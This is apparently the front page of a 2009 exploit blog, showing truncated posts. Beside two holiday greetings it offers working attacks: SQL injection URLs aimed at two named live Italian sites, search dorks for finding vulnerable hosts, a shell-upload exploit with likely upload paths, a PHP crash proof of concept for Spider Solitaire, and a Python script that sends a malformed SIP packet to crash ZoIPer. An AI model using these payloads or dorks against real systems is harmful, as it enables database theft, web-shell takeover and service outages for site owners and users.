Wednesday, December 23, 2009

merry christmas 2009 and happy new year 2010

Praying the blessings of the seasonwill refresh you this Christmas andthroughout the coming y...

Monday, December 14, 2009

Eurologon CMS SQL Injection Vuln

Software : Eurologon Content Management SystemVendor : http://www.content-manager.it/Author : NoGeContact : noge[dot]code[at]gmail[dot]comBlog : http://evilc0de.blogspot.com/[o] Vulnerable filelinks.php[o] Exploithttp://localhost/[path]/links.php?id=[SQL][o] Proof of concepthttp://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*[o] Dork"Powered by Eurologon"[o] Notesthis is a private scri...

Saturday, November 28, 2009

Joomla Component com_lyftenbloggie Remote SQL injection vulnerability

############################################################################################### Joomla Component com_lyftenbloggie Remote SQL injection vulnerability - (author) #### Author : kaMtiEz (kamzcrew[at]yahoo[dot]com) #### Homepage : http://www.indonesiancoder.com #### Date : November 11, 2009 ###############################################################################################[ Software Information ][+] Vendor : http://www.lyften.com/[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html[+]...

Friday, November 27, 2009

Flashden Shell Upload Vulnerability

# Exploit Title: Flashden Shell Upload Vulnerability# Date: 26.12.2009# Author: DigitALL# Greetz: Zombie KroNickq HackSpy and ALL 1923Turk.Biz Members# Vendor: http://www.jurgenvisser.nl# Version: 2.0# Dork: inurl:"select_file2.php"# Application: Please Add Files ( Your Shell ) And Upload.# Shell: /test/shell.php -- /up/shell.php -- /upload/shell.php -- /beta/shell.php OR one back d...

Wednesday, November 25, 2009

Idul-Adha 1428H

selamat merayakan idul adha 1428...

Thursday, October 15, 2009

Spider Solitaire local crash proof of concept exploit for Windows XP SP2.

!--php/*Spider Solitaire (Windows XP SP2) Local Crash PoCBy SirGodwww.insecurity.rowww.twitter.com/SirGodLoading a corrupt save file(spider.sav) will result in a local crashof Spider Solitaire*/$username="pwn"; //Replace with your computer username$file="spider.sav";$junk="Spider Solitaire Local Crash";$handle = fopen($file, 'w') or die("Can't create file");fwrite($handle,$junk);fclose($handle);$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";if(!copy($file,$file2)){ die("Can't copy file");} else{ echo "File succesfully...

ZoIPer v2.22 Call-Info Remote Denial Of Service

#!/usr/bin/python# ZoIPer v2.22 Call-Info Remote Denial Of Service.# Remote Crash P.O.C.# Author: Tomer Bitton (Gr33n_G0bL1n)# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10## Vendor Notified on: 21/09/2009# Vendor Fix: Fixed in version 2.24 Library 5324## Bad Chars: \x20 , \x09import sysimport socketimport osdef main(argc , argv):if len(sys.argv) != 2:os.system("cls")sys.exit("Usage: " + sys.argv[0] + " \n")target_host = sys.argv[1]target_port = 5060evil_packet ="\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\"\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\"\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\"\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\"\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\"\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\"\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\"\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\"\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\"\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\"\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\"\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\"\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\"\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\"\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\"\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\"\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\"\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\"\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\"\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\"\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\"\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"os.system("cls")print...

Page 1 of 1312345Next
Twitter Delicious Facebook Digg Stumbleupon Favorites More